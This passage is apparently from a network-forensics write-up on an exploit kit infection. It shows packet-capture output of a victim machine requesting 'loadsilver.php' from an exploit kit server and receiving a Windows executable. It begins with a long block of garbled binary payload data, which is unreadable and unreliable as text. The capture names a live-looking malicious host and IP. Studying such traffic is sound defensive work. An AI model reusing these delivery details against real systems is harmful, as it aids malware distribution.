tc.9:999=999..99.9999999y99999999999999999999999999999999999.9997&.79.0…8u..mQPJ.IKV^KXT.ZXWWVM.[\.KLW.PW.}vj.TV]\.443.9999999..1…_C.._C.._C..^C.._C…C.._C…C.._C…C.._C…C.._C..?C.._C…C.._CkPZQ.._C9999999999999999i|99u8=9..;q99999999.97.28>39.9991999999 +999)999y9999P`9)999;99<989<989=99999999I999=99..99:99=99=99)9999)99)999999)999i.99V999a.99A9999i999=9999999999999999999Y99E899.)99%99999999999999999999999999999999999A;99.9999)99.999999999999999999999999999.M\AM999..999)999.999=99999999999999.99Y.]XMX999)9999y999;999.99999999999999y99..KJKZ9999=999i999=999.99999999999999y99y.K\UVZ99.8999Y999;999.99999999999999y99{..;q.999..;qz999..;qi989..;qd999″.;q^999(.;qK99999999999TJOZKM.]UU9x}oxip ..]UU9r|kw|u ..]UU9wm}uu.}uu9lj|k ..]UU9jq|uu ..]UU9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999


BOOM... this exploit has succeeded. The GET request for “loadsilver.php” is actually a pointer to a location on the exploit kit server that serves the file “e53796b9e8cb041400466334.exe”, and as you can see below, another successful exploitation. Note: there is no discussion of malware here because there is no “callback”; in this example the executable failed to install properly because anti-virus quarantined it upon download (not that you could see that from the network traffic).
2014-05-18 22:27:53.049638 IP 192.168.204.222.49391 > 95.154.246.90.80: Flags [P.], seq 1:343, ack 1, win 64240, length 342
E..~.u@………_..Z…P@)g.)m..P…=l..GET /tresting/avalonr/loadsilver.php HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ley9nbu9c4c5r3oie3819it.ns1.bayandovmeci[.]com
Connection: Keep-Alive

2014-05-18 22:27:53.049647 IP 95.154.246.90.80 > 192.168.204.222.49391: Flags [.], ack 343, win 64240, length 0
E..(.?….f._..Z…..P..)m..@)i!P…0………
2014-05-18 22:27:53.257927 IP 95.154.246.90.80 > 192.168.204.222.49391: Flags [P.], seq 1:1269, ack 343, win 64240, length 1268
E….@….a._..Z…..P..)m..@)i!P….L..HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Mon, 19 May 2014 02:27:53 GMT
Content-Type: application/octet-stream
Content-Length: 94514
Connection: keep-alive
X-Powered-By: PHP/5.3.3
Accept-Ranges: bytes
Content-Disposition: inline; filename=e53796b9e8cb041400466334.exe

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..
